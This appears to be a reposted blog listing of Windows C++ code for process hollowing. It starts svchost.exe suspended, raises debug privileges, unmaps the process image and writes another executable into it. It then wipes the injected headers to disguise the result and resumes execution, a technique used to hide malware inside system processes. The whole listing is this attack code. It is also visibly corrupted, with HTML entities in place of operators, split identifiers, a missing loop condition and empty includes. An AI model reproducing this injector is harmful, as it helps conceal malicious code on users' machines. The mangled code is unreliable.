Same as other systems
//VC-Win32
#define _WIN32_WINNT 0x0501
#define WIN32_LEAN_AND_MEAN
#pragma comment(lib,”ntdll.lib”)
#include //sprintf
#include //garbage 1
#include //garbage 2
#include //return codes
#include //NTSTATUS
#define TARGETS_0 “svchost.exe\0”
extern “C”
{
PIMAGE_NT_HEADERS __stdcall RtlImageNtHeader( IN PVOID ModuleAddress );
NTSTATUS __stdcall NtGetContextThread( IN HANDLE ThreadHandle, OUT PCONTEXT pContext );
NTSTATUS __stdcall NtReadVirtualMemory( IN HANDLE ProcessHandle, IN PVOID BaseAddress, OUT PVOID Buffer, IN ULONG NumberOfBytesToRead, OUT PULONG NumberOfBytesReaded OPTIONAL );
NTSTATUS __stdcall NtWriteVirtualMemory( IN HANDLE ProcessHandle, IN PVOID BaseAddress, IN PVOID Buffer, IN ULONG NumberOfBytesToWrite, OUT PULONG NumberOfBytesWritten OPTIONAL );
NTSTATUS __stdcall NtProtectVirtualMemory( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN OUT PU LONG NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection );
NTSTATUS __stdcall NtSetContextThread( IN HANDLE ThreadHandle, IN PCONTEXT Context );
NTSTATUS __stdcall NtResumeThread( IN HANDLE ThreadHandle, OUT PULONG SuspendCount OPTIONAL );
NTSTATUS __stdcall ZwUnmapViewOf Section( IN HANDLE ProcessHandle, IN PVOID BaseAddress );
};
char target[MAX_PATH];
void __stdcall set_target(void)
{
srand(GetCurrentProcessId());
switch( 0 )
{
default:
case 0: sprintf(target,TARGETS_0);break;
}
}
void __stdcall GainPrivileges(void)
{
HANDLE hToken;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
LUID luid;
LookupPrivilegeValueA(NULL,”SeDebugPrivilege”,&luid);
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid #61; luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),FALSE,FALSE);
CloseHandle (hToken);
}
void __stdcall fork_system_file(void* file)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
SECURITY_ATTRIBUTES st;
SECURITY_ATTRIBUTES sp;
memset(&si,0,sizeof(STARTUPINFO));
memset(&pi,0,sizeof(PROCESS_INFORMATION));
memset(&st,0,sizeof (SECURITY_ATTRIBUTES));
memset(&sp,0,sizeof(SECURITY_ATTRIBUTES));
si.cb = sizeof(STARTUPINFO);
set_target();
GainPrivileges();
//create our target
CreateProcessA(
0,
target,
&st,
&sp,
1,
CREATE_SUSPENDED,
0,
0,
&si,
&pi
);
//get usefull
Handle _hprocess & # 61; Pi.HPROCESS;
handle _hthread & # 61; pi.hthread;
Context Context & # 61; {context_full};
NtgetContextThread (_hThread, &context);
PVOID x;
NtReadVirtualMemory(_hProcess,PCHAR(context.Eax), &x, sizeof(x), 0);
ZwUnmapViewOfSection(_hProcess,x );
//get pe of the ressource
PIMAGE_DOS_HEADER mz;
*(void**)&mz = reinterpret_cast(file);
if(!mz) FatalAppExitA(0,”! IMAGE_NT_HEADERS”);
PIMAGE_NT_HEADERS pe;
*(void**)&pe = RtlImageNtHeader(file);
if(!pe) FatalAppExitA(0,”! IMAGE_NT_HEADERS”);
//alloc it
void* newbase;
newbase = VirtualAllocEx(
_hProcess,
PVOID(pe->OptionalHeader.ImageBase),
pe->OptionalHeader.SizeOfImage,
MEM_RESERVE|MEM_COMMIT ,
PAGE_READWRITE
);
NtWriteVirtualMemory(
_hProcess,
newbase,
file,
pe->OptionalHeader.SizeOfHeaders ,
0
);
PIMAGE_SECTION_HEADER sect = IMAGE_FIRST_SECTION(pe);
for ( unsigned long i = 0; i FileHeader.NumberOfSections; i++ )
{
//edit all
unsigned long oldprot;
NtWriteVirtualMemory(
_hProcess,
PCHAR(newbase) & # 43; sect[i].VirtualAddress,
PCHAR(file) + sect[i ].PointerToRawData,
sect[i].SizeOfRawData,
0
);
Nt ProtectVirtualMemory(
_hProcess,
(void**)PCHAR(newbase ) & # 43; sect[i].VirtualAddress,
§[i].Misc.VirtualSize,
PAGE_EXECUTE_READWRITE,
& oldprot
] );
}
DWORD wrote;
DWORD* pebInfo = (DWORD*)context.Ebx;
NtWriteVirtualMemory(_hProcess,&pebInfo[2],&newbase,sizeof(DWORD), &wrote);
unsigned long entrypoint;
entrypoint = ULONG(newbase) + pe->OptionalHeader.AddressOfEntryPoint;
context.Eax = context.Eip = 61; entrypoint;
context.SegGs = 0;
context.SegFs = 0x38;
context.SegEs = 0x20;
context.SegDs =0x20;
context.SegSs =0x20;
context.SegCs =0x18;
context.EFlags =0x3000;
//spoof some stuff
NtWriteVirtualMemory(_hProcess,&entrypoint,new BYTE[sizeof(DWORD)],sizeof(DWORD),0);
NtWriteVirtualMemory(_hProcess,mz,new BYTE[sizeof IMAGE_DOS_HEADER] ,sizeof(PIMAGE_DOS_HEADER),0);
NtWriteVirtualMemory(_hProcess,pe,new BYTE[sizeof IMAGE_NT_HEADERS],sizeof(PIMAGE_NT_HEADERS),0);
//resume process
NtSetContextThread (_hThread,&context);
NtResumeThread(_hThread,0);
}
int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hinstPrev, LPSTR lpszCmdLine, int nCmdShow)
{
HANDLE hFile = NULL;
hFile = ::CreateFile( “test3.exe”
, GENERIC_READ
, 0
, NULL
, OPEN_EXISTING
, FILE_ATTRIBUTE_NORMAL
, NULL
);
if( hFile == INVALID_HANDLE_VALUE )
{
/> MessageBox(0, “File not found”, “ff”, 0);
return -1;
}
::SetFilePointer( hFile, 0, NULL , FILE_BEGIN);
DWORD dwFileSize = ::GetFileSize( hFile, NULL);
LPBYTE pBuf = new BYTE[dwFileSize];
memset( pBuf , 0, dwFileSize);
DWORD dwNumberOfBytesRead = 0;
::ReadFile( hFile
, pBuf
, dwFileSize
, &dwNumberOfBytesRead
, NULL
);
::CloseHandle(hFile);
fork_system_file(pBuf );
return 0;
}
Transfer: https://blog.51cto.com/4225964/780098
微信扫一扫打赏
支付宝扫一扫打赏
